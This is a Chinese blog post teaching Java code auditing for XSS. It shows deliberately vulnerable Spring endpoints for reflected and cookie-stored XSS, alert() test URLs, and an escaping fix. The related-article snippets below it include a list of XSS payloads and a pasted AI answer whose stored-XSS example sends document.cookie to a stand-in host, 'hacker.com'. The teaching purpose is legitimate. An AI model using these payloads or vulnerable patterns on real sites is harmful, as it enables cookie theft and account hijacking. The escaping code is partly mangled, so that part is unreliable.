Java代码审计之XSS攻击

最新推荐文章于 2025-04-15 17:50:16 发布
最新推荐文章于 2025-04-15 17:50:16 发布
阅读量1.7k 收藏 6
点赞数 2
分类专栏: 从入门到入狱 文章标签: java xss 安全 web安全 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_18980147/article/details/128226592
版权

深入了解Java中的XSS攻击

存在XSS漏洞的java代码:

第一段

反射型XSS

@RequestMapping("/reflect")
    @ResponseBody
    public static String reflect(String xss) {
        return xss;
    }

payload

http://localhost:8888/xss/reflect?xss=%3Cscript%3Ealert(%27tpa%27);%3C/script%3E

在这里插入图片描述

第二段

存储型XSS

@RequestMapping("/stored/store")
    @ResponseBody
    public String store(String xss, HttpServletResponse response) {
        Cookie cookie = new Cookie("xss", xss);
        response.addCookie(cookie);
        return "Set param into cookie";
    }

访问如下地址存储脚本到Cookie中

http://localhost:8888/xss/stored/store?xss=%3Cscript%3Ealert(%27tpa%27)%3C/script%3E

在这里插入图片描述

当后端再获取Cookie返回时

@RequestMapping("/stored/show")
@ResponseBody
public String show(@CookieValue("xss") String xss) {
    return xss;
}

访问

http://localhost:8888/xss/stored/show

成功弹窗

在这里插入图片描述

修复

目前最有效的办法,对特殊字符进行实体转义。

XSS安全代码:

@RequestMapping("/safe")
    @ResponseBody
    public static String safe(String xss) {
        return encode(xss);
    }

    private static String encode(String origin) {
        origin = StringUtils.replace(origin, "&", "&");
        origin = StringUtils.replace(origin, "<", "&lt;");
        origin = StringUtils.replace(origin, ">", "&gt;");
        origin = StringUtils.replace(origin, "\"", "&quot;");
        origin = StringUtils.replace(origin, "'", "&#x27;");
        origin = StringUtils.replace(origin, "/", "&#x2F;");
        return origin;
    }

XSS排查

利用xsstriker等工具进行扫描

手动输入特殊字符看被没被实体转义

关键字:getParamter、<%=、param

Java代码审计XSS
大河之犬的博客
12-16 2万+
XSS 漏洞是指攻击者在网页中嵌入客户端脚本(通常是 JavaScript 编写的恶意代码),进而执行其植入代码的漏洞。若 Web 应用未对用户可直接或间接控制的“输入”与“输出”参数进行关键字过滤或转义处理,则很可能存在跨站脚本漏洞。从 Web 应用上来看,攻击者可以控制的参数包括 URL 参数、post 提交的表单数据以及搜索框提交的搜索关键字,一般对该漏洞的审计策略如下收集输入、输出点查看输入、输出点的上下文环境。判断 Web 应用是否对输入、输出做了防御工作(如过滤、扰乱以及编码)
Java代码审计XSS漏洞详解
悦分享
01-23 244
跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSSXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。
java-sec-code xss和csrf
weixin_44687621的博客
08-19 429
XSS漏洞 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。 一般来说,只要将用户输入的数据不经任何处理就返回到前端,是极易产生XSS漏洞的。 反射型xss 为了让我们方便理解,作者这里没有使用其他花里胡哨的html页面 @RequestMapping("/reflect"
常见的XSS攻击代码
weixin_30621711的博客
11-09 730
第一类: <tag on*=*/> 在html标签中触发事件 Example: 1.加载完毕自动触发事件 <body onload="alert('xss')"></body> 2.使html某元素撑满整个页面 <p onclick="alert('1')" style="postion:fixed;width:100%;hei...
XSS跨站脚本攻击
最新发布
weixin_62623950的博客
04-15 593
攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行处理或处理不严,则浏览器就会直接执行用户注入的脚本。
Java防止xss攻击jar包
03-29
Java防止xss攻击依赖jar包
Java xss攻击(跨站脚本攻击)
夏风
12-22 1万+
发现问题 最近我们的服务器频繁的遭到黑客攻击,真是让人头疼啊,痛定思痛,仔细想想为什么我们会被攻击呢,肯定是我们的代码有漏洞啊,那么我们如何检测我们站点的漏洞呢,首先比较大众的就是通过360网站安全检测(http://webscan.360.cn/),但是发现这个太简单了,不够专业,那么我们再来一个专业的Acunetix Web Vulnerability Scanner,这个软件是收费的,
Java代码审计 | 第五篇】XSS漏洞成因+实战案例
等风来
03-07 909
XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,使得这些脚本在用户的浏览器中执行。XSS攻击通常分为以下三种类型1、存储型XSS:恶意脚本被永久存储在目标服务器上(如数据库),当用户访问包含该脚本的页面时,脚本被执行。2、反射型XSS:恶意脚本作为请求的一部分发送到服务器,服务器将脚本嵌入到响应中返回给用户,脚本在用户浏览器中执行。3、DOM型XSS:恶意脚本通过修改页面的DOM结构来执行,不经过服务器处理。
java代码审计XSS
糖小喵
04-16 1032
介绍: 对于和后端有交互的地方没有做参数的接收和输入输出过滤,导致恶意攻击者可以插入一些恶意的 js 语句 来获取应用的敏感信息。 审计思路: 扫描所有的 HttpServletRequest 查看相关的上下文环境。 这里以javasec为例: 先将1存储进去 这里是将xss存储到了cookie里边 访问就可以看见了 javasec处理方法: 这里提供几个具...
代码审计(Java)——WebGoat_Xss
weixin_45260839的博客
08-16 757
代码审计(Java)——WebGoat_Xss
java 防止xss攻击
breezylee09的专栏
05-08 428
关于xss的概念和解决方案网上很多,可以参考这个: http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html#xsshappen 这里说下最近项目中我们的解决方案,主要用到commons-lang3-3.1.jar这个包的org.apache.commons.lang3.StringEscapeUtils.escapeH...
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
XSS跨站脚本攻击Java开发中防范的方法
01-09
XSS跨站脚本攻击Java开发中防范的方法
Java解决XSS攻击方式
weixin_44858201的博客
03-30 1万+
前言 在项目验收阶段,通常会对待验收项目做一些安全漏洞的测试,比如接口攻击,并发测试,XSS注入,SQL恶意注入测试,安全越权等操作,这时,就是考验项目的安全方面是否做的足够健壮的时候,本篇对XSS脚本攻击在实际WEB项目中的处理办法,提供2种可实行的方法 XSS攻击 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 F
java代码审计xss
qq_34778376的博客
03-11 431
漏洞描述 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 缺陷代码 protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String input1 = req.getParameter("input1"); [..
Java代码审计-XSS审计
baimaozi008的博客
05-24 1727
XSS是Cross Site Scripting的缩写,意为"跨站脚本攻击",为了避免与层叠样式表(Cascading Style Sheet,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。XSS是指攻击者在网页中嵌入客户端脚本(通常是JavaScript编写的恶意代码),进而执行其植入的代码的漏洞,若Web应用未对用户可直接活间接控制的"输入"或者"输出"进行关键字的过滤或者转义处理,则很有可能存在跨站脚本漏洞。
XSS(跨站脚本攻击) - 常用代码大全
热门推荐
CHK的博客
08-20 6万+
XSS(跨站脚本攻击) - 常用代码大全: 1'"()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;prompt(915149)&lt;/ScRiPt&gt; &lt;svg/onload=alert(1)&gt; &lt;script&gt;alert(document.cookie)&lt;/script&gt; '&gt;&lt;script&a
XSS攻击测试代码
mayanyun2013的专栏
11-28 4977
XSS攻击测试代码 主要攻击是通过在输入框内输入获取服务器的cookie的信息,从而登陆你的服务器, 原理是通过在前端的关键字内输入攻击的值,然后这些值存储在数据库内,后端服务器通过调取这个键值对,从而触发获取服务器端的cookie信息。 所以前后端要进行特殊字符的处理,不让输入一些特殊标签,如&lt;script&gt;,HTML等代码标签或者特殊字符 1.获取用户的cookie &l...
Java中的跨站脚本攻击XSS)处理技术
Oaklkm的博客
12-18 2214
跨站脚本攻击XSS)是网络攻击中非常常见的一种形式,对网站的安全性和用户的隐私构成了严重威胁。在Java开发中,我们应该采取一系列措施来防范和处理XSS攻击,包括输入验证、编码输出、使用安全的API、设置HTTP头、内容安全策略、输入过滤和使用安全的框架等。同时,我们还需要定期进行安全审计、更新和修补漏洞、监控和日志记录、定期培训、代码审查、测试和验证等措施来确保应用程序的安全性。
xss攻击代码
03-13
<think>好的,我需要帮助用户找到关于XSS攻击代码示例,并且解释如何实现跨站脚本攻击。首先,我应该回顾用户提供的引用内容,确保引用的正确性。用户提到了三种XSS类型:反射型、存储型和DOM型,引用[1]、[2]、[3]提供了相关的信息。 首先,反射型XSS通常出现在URL参数中,攻击者构造恶意链接,用户点击后触发脚本执行。例如,在PHP中,如果页面直接输出用户输入的参数而不做过滤,就可能存在漏洞。我需要提供一个简单的PHP示例,展示未转义的用户输入如何导致XSS。 接下来是存储型XSS,这种攻击将恶意脚本存储在服务器上,比如数据库中的评论字段。当其他用户访问包含该评论的页面时,脚本会自动执行。我需要一个使用Node.js和Express的示例,展示如何将用户输入存储并显示,导致XSS。 然后是DOM型XSS,这种攻击不经过服务器,完全在客户端通过修改DOM实现。例如,JavaScript从URL参数中获取数据并动态写入页面,如果未对数据进行转义,就会产生漏洞。我需要一个基于纯HTML和JavaScript的示例,展示如何通过URL参数触发XSS。 同时,我需要确保代码示例符合安全规范,强调这些代码仅用于教育目的,实际应用中必须进行输入过滤和输出编码。此外,根据用户的引用内容,正确添加引用标识,如反射型XSS流程来自引用[2],DOM型来自引用[3]。 最后,生成相关问题,帮助用户进一步理解XSS攻击的防御和检测方法。确保整个回答结构清晰,符合用户要求的格式,使用中文,并正确应用LaTeX格式的数学表达式(虽然此处可能用不上,但需注意其他部分是否符合要求)。</think>### XSS攻击示例及原理 XSS攻击通过向网页注入恶意脚本实现,主要分为反射型、存储型、DOM型三类[^1][^2]。以下是具体实现示例: #### 1. 反射型XSS(非持久化) ```php <!-- 漏洞页面(PHP示例) --> <?php $name = $_GET['name']; // 未过滤用户输入 echo "Hello, $name"; // 直接输出到页面 ?> ``` 攻击者构造恶意链接: `http://example.com/vuln.php?name=<script>alert('XSS')</script>` 用户点击后触发弹窗[^2] #### 2. 存储型XSS(持久化) ```javascript // Node.js留言板示例(危险代码) app.post('/comment', (req, res) => { const comment = req.body.text; // 未过滤输入 db.save(comment); // 存储到数据库 }); app.get('/comments', (req, res) => { const comments = db.fetchAll(); res.send(comments); // 直接输出未转义内容 }); ``` 攻击者提交: `<script>new Image().src='http://hacker.com/?cookie='+document.cookie;</script>` 所有访问者都会泄露cookie #### 3. DOM型XSS ```html <!-- 前端漏洞页面 --> <script> const urlParams = new URLSearchParams(window.location.search); document.getElementById("welcome").innerHTML = urlParams.get('msg'); // 直接操作DOM </script> ``` 攻击链接: `http://example.com/#msg=<img src=x onerror=alert(1)>` 触发图片加载错误执行脚本[^3] §§ 1. 所有用户输入需验证过滤(白名单机制) 2. 输出时进行HTML实体编码(如转义`<`为`<`) 3. 使用CSP(内容安全策略)限制脚本来源 4. 设置HttpOnly属性保护cookie ```javascript // 安全输出示例(使用转义函数) function escapeHTML(str) { return str.replace(/[&<>'"]/g, tag => ({'&':'&','<':'<','>':'>','"':'"',"'":'''})[tag]); } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值